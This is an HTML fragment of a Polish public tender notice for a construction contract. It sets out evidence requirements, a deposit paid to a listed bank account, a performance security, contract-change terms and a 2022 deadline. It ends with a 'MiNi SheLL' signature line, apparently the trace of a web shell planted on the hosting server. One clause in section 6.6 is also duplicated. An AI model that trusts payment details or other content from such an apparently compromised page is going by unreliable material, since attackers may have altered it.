którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. –<br/>załącznik nr 9 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie w zakresie pkt 5.2.1. składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. 5.2.2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych ( zgodnie z pkt 1.3.1 Dział XV SWZ) w zakresie niezbędnym do wykazania<br/>spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem<br/>terminu do składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca<br/>wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z<br/>zasadami wiedzy technicznej i prawidłowo ukończone /załącznik nr 6 do SWZ/. Oferent winien<br/>załączyć dokumenty (dowody) potwierdzające, że roboty zostały wykonane z należytą starannością.<br/>Wymaga się, aby Oferent zrealizował przynajmniej dwie oddzielne roboty budowlane polegające na<br/>budowie budynku mieszkalnego lub budynku użyteczności publicznej, lub budynku rekreacyjnego w<br/>technologii murowanej wraz z instalacjami sanitarnymi i elektrycznymi za kwotę nie<br/>mniejszą niż 200 000,00 zł brutto. (za 1 budynek) Dowodami, o których mowa powyżej są: a)<br/>referencje/ poświadczenie – wystawione przez podmioty na rzecz których usługi są lub roboty zostały<br/>wykonane. b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze<br/>Wykonawca nie jest w stanie uzyskać referencji lub poświadczenia, o których mowa w ppkt. a), Jeżeli<br/>Wykonawca nie jest w stanie uzyskać referencji lub poświadczenia – musi podać i uzasadnić przyczyny<br/>braku możliwości przedłożenia referencji lub poświadczenia oraz wykazać, że są to przyczyny<br/>obiektywne, czyli niezależne od Wykonawcy. Wykonawca nie ma obowiązku przedkładania dowodów,<br/>o których mowa wyżej – w przypadku, gdy Zamawiający jest podmiotem na rzecz którego zostały<br/>wykonane usługi wskazane w wykazie. Wykaz osób, które będą uczestniczyć w wykonywaniu<br/>zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, oraz informacją o podstawie do<br/>dysponowania tymi osobami. /załącznik nr 8 do SWZ/ Jeżeli pełniona funkcja tego wymaga należy<br/>najpóźniej w dniu podpisania umowy przedstawić kopię posiadanych uprawnień dla osób<br/>wyszczególnionych w załączniku 8 zgodnie z pkt 1.3.2 Dział XV SWZ (kierownik budowy i kierownicy<br/>robót). Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca<br/>posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych w kwocie nie<br/>mniejszej niż 200 000,00 zł lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż 200<br/>000,00 zł wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem. Opłaconą polisę lub<br/>dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na<br/>kwotę min. 400 000,00 zł ważną minimum na czas związania z ofertą.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 8.1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru; 8.2. Jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów, o których mowa w pkt 8.1. -pełnomocnictwo lub inny dokument (np. akt powołania<br/>na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w<br/>systemie common law, członka rady dyrektorów spółki, a także umowa spółki cywilnej lub<br/>uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do<br/>reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy; 8.3.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia; 8.4. Oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia oraz o spełnienie<br/>warunków udziału w postepowaniu - oświadczenie Załącznik nr 5 do SWZ. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu<br/>wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu składa każdy z Wykonawców.;<br/>W przypadku powoływania się na zasoby podmiotu trzeciego Wykonawca, w przypadku<br/>polegania na zdolnościach technicznych lub podmiotów udostępniających zasoby, przedstawia<br/>wraz z oświadczeniem, o którym wyżej mowa, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby<br/>(załącznik nr 5a do SWZ). 8.5. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby,<br/>do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze<br/>zdolności innych podmiotów na zasadach określonych w art. 118 ust. 3 i 4 ustawy PZP).<br/>Zobowiązanie lub inny podmiotowy środek dowodowy w opisywanym zakresie, przekazuje się w<br/>postaci elektronicznej, i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym. W przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy) zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się<br/>cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. 8.6. Dowód wpłaty wadium. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepoleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu<br/>składa każdy z Wykonawców. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 5 000,00 zł.<br/>2.	Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:<br/>a.	pieniądzu, przelewem na rachunek bankowy w: BNP Paribas S.A. O/Katowice nr 05 2030 0045 1110 0000 0041 8570 w taki sposób, aby znalazły się na rachunku Zamawiającego przed upływem terminu składania ofert,<br/>b.	gwarancjach bankowych,<br/>c.	gwarancjach ubezpieczeniowych,<br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz.U. z 2020r. poz. 299 ze zm.).<br/>3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. Ustawy PZP<br/>4.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający będzie żądał od wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wniesienia najpóźniej w dniu podpisania umowy zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie.<br/>2.	Zabezpieczenie może być wniesione, według wyboru wykonawcy, w jednej lub w kilku następujących formach: <br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, <br/>3) gwarancjach bankowych, <br/>4) gwarancjach ubezpieczeniowych, <br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego. <br/>4.	W trakcie realizacji umowy wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w ust. 2. Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.<br/>5.	W przypadku nieprzedłużenia lub niewniesienia nowego zabezpieczenia najpóźniej na 30 dni przed upływem terminu ważności dotychczasowego zabezpieczenia wniesionego w innej formie niż w pieniądzu, zamawiający zmienia formę na zabezpieczenie w pieniądzu, przez wypłatę kwoty z dotychczasowego zabezpieczenia.<br/>6.	Zamawiający dokona zwrotu zabezpieczenia należytego wykonania umowy w następujący sposób:<br/>1)	70% wartości zabezpieczenia zostanie zwrócone w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane;<br/>2) 30% wartości zabezpieczenia Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady lub W przypadku nieprzedłużenia lub niewniesienia nowego zabezpieczenia najpóźniej na 30 dni przed upływem terminu ważności dotychczasowego zabezpieczenia wniesionego w innej formie niż w pieniądzu, zamawiający zmienia formę na zabezpieczenie w pieniądzu, przez wypłatę kwoty z dotychczasowego zabezpieczenia gwarancji – kwota ta zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe określone w załączniki nr 7 do SWZ. 1. Strony ustalają, iż zmiany do Umowy będą<br/>dokonywane zgodnie z przepisami ustawy z dnia 23 kwietnia 1964 r. Kodeks Cywilny, jeżeli<br/>przepisy ustawy PZP nie stanowią inaczej (w szczególności art. 455 ustawy PZP). 2. Strony<br/>dopuszczają możliwość zmiany terminu zakończenia robót, o okres trwania przyczyn, z powodu<br/>których będzie zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>1) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót<br/>będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w<br/>szczególności będą następstwem nieterminowego przekazania Terenu budowy, konieczności<br/>zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły<br/>mieć wpływ na dotrzymanie Terminu zakończenia robót, 2) gdy wystąpią niekorzystne warunki<br/>atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu<br/>technologii realizacji prac określonej w normach – tj. silne opady deszczu powodujące powódź<br/>lub podtopienia na placu budowy, silne wiatry sięgające w porywach powyżej 30m/s, 3) gdy<br/>wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania<br/>przedmiotu Umowy ze względu na zasady wiedzy technicznej oraz udzielenia zamówień<br/>dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia<br/>niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty<br/>inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, 4) wystąpią<br/>opóźnienia w dokonaniu przez właściwe organy administracji państwowej określonych czynności<br/>lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem<br/>okoliczności, za które Wykonawca ponosi odpowiedzialność, 5) gdy wystąpią opóźnienia w<br/>wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są<br/>zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem<br/>okoliczności, za które Wykonawca ponosi odpowiedzialność, 6) jeżeli wystąpi brak możliwości<br/>wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub<br/>nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy, 7)<br/>wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jejpostanowieniami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com